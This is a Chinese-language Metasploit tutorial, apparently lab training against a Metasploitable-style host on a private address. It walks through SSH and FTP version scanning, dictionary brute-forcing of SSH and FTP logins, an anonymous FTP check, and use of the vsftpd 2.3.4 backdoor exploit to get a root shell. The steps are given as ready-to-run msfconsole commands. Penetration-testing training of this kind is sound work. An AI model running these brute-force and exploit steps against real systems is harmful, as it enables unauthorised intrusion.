基于 SSH 协议收集信息
查看 ssh 服务的版本信息
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run
复制代码
对 SSH 暴力破解
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
复制代码
设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-
framework/data/wordlists/root_userpass.txt
复制代码
因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口
┌──(root💀xuegod53)-[~]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
复制代码
回到 MSF 终端
msf6 auxiliary(scanner/ssh/ssh_login) > run
复制代码
因为我们是在文件的最后添加的,所以前面的都是失败的操作。
基于 FTP 协议收集信息
查看 ftp 服务的版本信息
加载 ftp 服务版本扫描模块
msf6 > use auxiliary/scanner/ftp/ftp_version
复制代码
查看设置参数
msf6 auxiliary(scanner/ftp/ftp_version) > show options
复制代码
设置目标 IP,可以设置多个
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180
复制代码
执行扫描,输入 exploit 或 run
msf6 auxiliary(scanner/ftp/ftp_version) > run
复制代码
扫描出结果是:vsFTPd 2.3.4
msf6 auxiliary(scanner/ftp/ftp_version) > back
复制代码
扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块
或者搜索 vsftpd
我们发现存在一个 exploit 模块,而且这个版本的 ftp 服务存在一个后门我们尝试利用下这个模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
复制代码
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
复制代码
拿到了 shell,而且是 root 权限,我们尝试执行下命令执行 id 命令, 查看当前用户
执行 ifconfig 命令,查看 IP 地址
ftp 匿名登录扫描
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) show options
复制代码
msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run
复制代码
ftp 暴力破解
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options
复制代码
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
复制代码
设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-
framework/data/wordlists/root_userpass.txt
复制代码
因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口
┌──(root💀xuegod53)-[~]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
复制代码
回到 MSF 终端
msf6 auxiliary(scanner/ftp/ftp_login) > run
复制代码
因为我们是在文件的最后添加的,所以前面的都是失败的操作。
评论